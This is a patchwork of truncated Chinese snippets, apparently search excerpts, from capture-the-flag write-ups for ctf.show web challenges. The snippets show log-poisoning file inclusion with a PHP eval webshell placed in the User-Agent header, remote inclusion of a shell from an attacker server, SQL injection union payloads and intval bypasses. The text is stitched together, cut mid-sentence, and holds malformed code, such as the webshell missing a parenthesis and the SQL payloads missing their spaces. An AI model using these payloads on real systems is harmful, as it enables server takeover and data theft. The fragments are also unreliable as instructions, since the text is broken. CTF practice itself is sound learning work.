注意到可以在UA头里拼接一句话传入日志文件中。 4.使用蚁剑进行连接。在上层目录中找到flag
在购买的阿里云服务器中编写一句话木马(阿里云服务器已启动http协议),添加abc是为了测试是否成功 https://b297bb10-8978-4c85-a1cc-027ebb8a9015.chall.ctf.show/?url=http://xxx.xxx.xxx.xxx/shell.php 看到abc说明测试成功,使用蚁剑或菜刀去连接,这里我使用的是蚁剑,测试连接 在www目录下发现flag 查看flag....
连接url即为日志的地址:http://ec78819f-174d-4e26-82be-7cce55c08b05.challenge.ctf.show/?url=/var/log/nginx/access.log 连接成功 进入后台,找到flag ctfshow{8df69fe0-d37b-4231-a482-c3d93c89f43c}
简介:ctf.show 萌新模块 web4关,这一关考察的是 intval()函数转换字符串的特性,以及SQL注入漏洞的绕过方式,源码中过滤了or,加减乘除(+-*/),左右移,括号,|,select等关键字,我们使用短路逻辑或(||)来替替代 or 即可 ctf.show 萌新模块 web4关,这一关考察的是 intval()函数转换字符串的特性,以及SQL注入漏洞...
CTFshow(web2-4),文章目录web02web03web02进入可以看到表单,很明显这是POST注入,可以利用万能密码进行登录测试:登陆成功回显查看1'or1=1unionselect1,2,3#进行数据库的查询1'or1=1unionselect1,database(),3#查询表1'or1=1unionselect1,table_name,3frominformation_sch
?v1=1&v2=var_dump($ctfshow)/*&v3=*/;Web101(反射API)什么东西一大片,不会。求助hint和wp,得知php有个反射类(我对面向对象不是很熟悉)。反射,通俗来讲就是可以通过一个对象来获取所属类的具体内容,php中内置了强大的反射API:ReflectionClass:一个反射类,功能十分强大,内置了各种获取类信息的方法...
ctfshow--web4 include日志注入 这题和第三题有点不一样,这题的把php 和 data 都过滤掉了 一旦我们输入这个关键字就页面就会报error 一开始是没啥头绪的,后面上网查了一下,可以通过日志记录来注入代码 对于Apache,日志存放路径:/var/log/apache/access.log...
ctfshow-web4 打开之后发现和web3有点像,但是用之前的方法做不出来了 传参url=/var/log/nginx/access.log获取日志目录 使用burpsuite抓包 在User-Agent中加入一句话木马 <?php @eval($_POST['a'];?> 使用蚁剑连接 得到flag ctfshow{f755138b-0c50-4507-9cb2-67835c95ae08}...
Web Web签到题(注释隐藏,base64编码) F12,发现注释里面有一串base64,解码拿到flag。 Web2(sql盲注) 打开题目一看似乎是个时间盲注,直接丢sqlmap爆破拿到flag。 Web3(文件包含,伪协议) 主页上有这么一行代码,很明显是文件包含漏洞,get一下url的值,
Web4(php intval特性) 你说阿呆一次一次一次换了多少个正则匹配了,改过不啦,换汤不换药啊。 Web5(php intval特性) 过滤掉了很多,但是~~1000和144^888依然可以绕过。 Web6(php intval特性) 异或也被过滤了,终极大杀器~~1000依然有效。 Web7(php intval特性) ...